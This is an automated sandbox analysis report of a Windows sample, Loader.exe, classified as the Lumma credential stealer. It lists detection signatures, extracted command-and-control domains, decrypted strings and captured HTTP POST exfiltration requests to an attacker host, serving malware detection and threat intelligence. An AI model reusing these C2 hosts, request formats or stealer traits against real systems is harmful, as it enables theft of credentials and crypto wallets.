Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1579012
MD5:99604ef7ebf56a566a0cdb4b6bb0fa08
SHA1:f16ce4bd1ba5eba29494ff69ac8d263e2f9110b7
SHA256:cca815d086ab89c36262865aaa9e0dd7dc02830aec4e6a3fa8b662b65adf7ce0
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Loader.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 99604EF7EBF56A566A0CDB4B6BB0FA08)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["debonairnukk.xyz", "immureprech.biz", "deafeninggeh.biz", "effecterectz.xyz", "ingreem-eilish.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Loader.exe PID: 6448JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Loader.exe PID: 6448JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Loader.exe PID: 6448JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:41:44.381468+010020283713Unknown Traffic192.168.2.549756104.21.90.135443TCP
              2024-12-20T17:41:46.378510+010020283713Unknown Traffic192.168.2.549761104.21.90.135443TCP
              2024-12-20T17:41:48.661686+010020283713Unknown Traffic192.168.2.549767104.21.90.135443TCP
              2024-12-20T17:41:50.819969+010020283713Unknown Traffic192.168.2.549773104.21.90.135443TCP
              2024-12-20T17:41:53.431410+010020283713Unknown Traffic192.168.2.549780104.21.90.135443TCP
              2024-12-20T17:41:55.900795+010020283713Unknown Traffic192.168.2.549786104.21.90.135443TCP
              2024-12-20T17:41:57.871064+010020283713Unknown Traffic192.168.2.549792104.21.90.135443TCP
              2024-12-20T17:42:00.820993+010020283713Unknown Traffic192.168.2.549799104.21.90.135443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:41:45.098343+010020546531A Network Trojan was detected192.168.2.549756104.21.90.135443TCP
              2024-12-20T17:41:47.097956+010020546531A Network Trojan was detected192.168.2.549761104.21.90.135443TCP
              2024-12-20T17:42:01.648299+010020546531A Network Trojan was detected192.168.2.549799104.21.90.135443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:41:45.098343+010020498361A Network Trojan was detected192.168.2.549756104.21.90.135443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:41:47.097956+010020498121A Network Trojan was detected192.168.2.549761104.21.90.135443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:41:51.622335+010020480941Malware Command and Control Activity Detected192.168.2.549773104.21.90.135443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "immureprech.biz", "deafeninggeh.biz", "effecterectz.xyz", "ingreem-eilish.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}
              Multi AV Scanner detection for submitted file
              Source: Loader.exeReversingLabs: Detection: 57%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.4% probability
              Machine Learning detection for sample
              Source: Loader.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: ingreem-eilish.biz
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--b58c2f805636
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0041729C CryptUnprotectData,1_2_0041729C
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Admin\Workspace\1199853044\Project\Release\Project.pdb source: Loader.exe
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C9255 FindFirstFileExW,1_2_011C9255
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then lea edi, dword ptr [esi+esi]1_2_0040D120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx1_2_0043CA12
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h1_2_0043EB50
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]1_2_0042DB7F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+50h]1_2_00437BC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2D1F4786h]1_2_0043D010
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax1_2_0042A0E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0041C08C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, edx1_2_00409150
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al1_2_00409150
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [esi], al1_2_00409150
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax1_2_00405950
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax1_2_00405950
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h1_2_00414170
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h]1_2_00429170
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh1_2_00418176
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, word ptr [ecx]1_2_0041912E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h]1_2_0041912E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_004349C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx1_2_0043C9DB
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004189F5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_0042B980
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]1_2_0043D980
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]1_2_0043D980
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-47h]1_2_0041D200
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, ecx1_2_00423A1C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h]1_2_00417A28
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h]1_2_00409AC1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh]1_2_00409AC1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0042C2CF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh1_2_00418176
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]1_2_0043DA80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]1_2_0043DA80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx1_2_0043CA9D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx1_2_0043CB51
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041BB5A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]1_2_0043DBF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]1_2_0043DBF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004223A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ecx*8], A269EEEFh1_2_004383A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]1_2_0040A3AA
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movsx esi, byte ptr [ebp+ecx+00h]1_2_0043D450
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]1_2_0042DB7A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h1_2_0042B4D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h1_2_004144D5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]1_2_0043DC80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]1_2_0043DC80
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, edi1_2_004074A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h]1_2_0041C4A1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h1_2_004144A5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [004446A8h]1_2_00416D51
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]1_2_0043DD00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]1_2_0043DD00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+20h]1_2_0042A5CF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+38h]1_2_0041C661
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h]1_2_00438630
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00438630
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], bl1_2_00408EF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2832B6A5h]1_2_00429E44
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax1_2_00422F0D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [00444700h]1_2_00416F11
              Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042AF10

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49756 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49756 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49761 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49761 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49799 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49773 -> 104.21.90.135:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: ingreem-eilish.biz
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49761 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49767 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49780 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49792 -> 104.21.90.135:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49786 -> 104.21.90.135:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O9SCPS6TVHZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12800Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XPBUSMJFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15024Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3905CUVZJU7SAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20544Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UB51S031P6CFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1230Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AL2QEEAZ77KVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1093Host: ingreem-eilish.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: ingreem-eilish.biz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: ingreem-eilish.biz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ingreem-eilish.biz
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2567538989.000000000145D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.0000000001457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/
              Source: Loader.exe, 00000001.00000003.2640883555.000000000146F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2641218007.0000000001476000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2640956088.0000000001474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/&&
              Source: Loader.exe, 00000001.00000002.2712486611.0000000001457000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2690412895.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2640936744.000000000147A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/api
              Source: Loader.exe, 00000001.00000002.2712486611.000000000140C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/apiC
              Source: Loader.exe, 00000001.00000002.2712836874.000000000147C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2690412895.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/apiX
              Source: Loader.exe, 00000001.00000003.2690435332.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/h
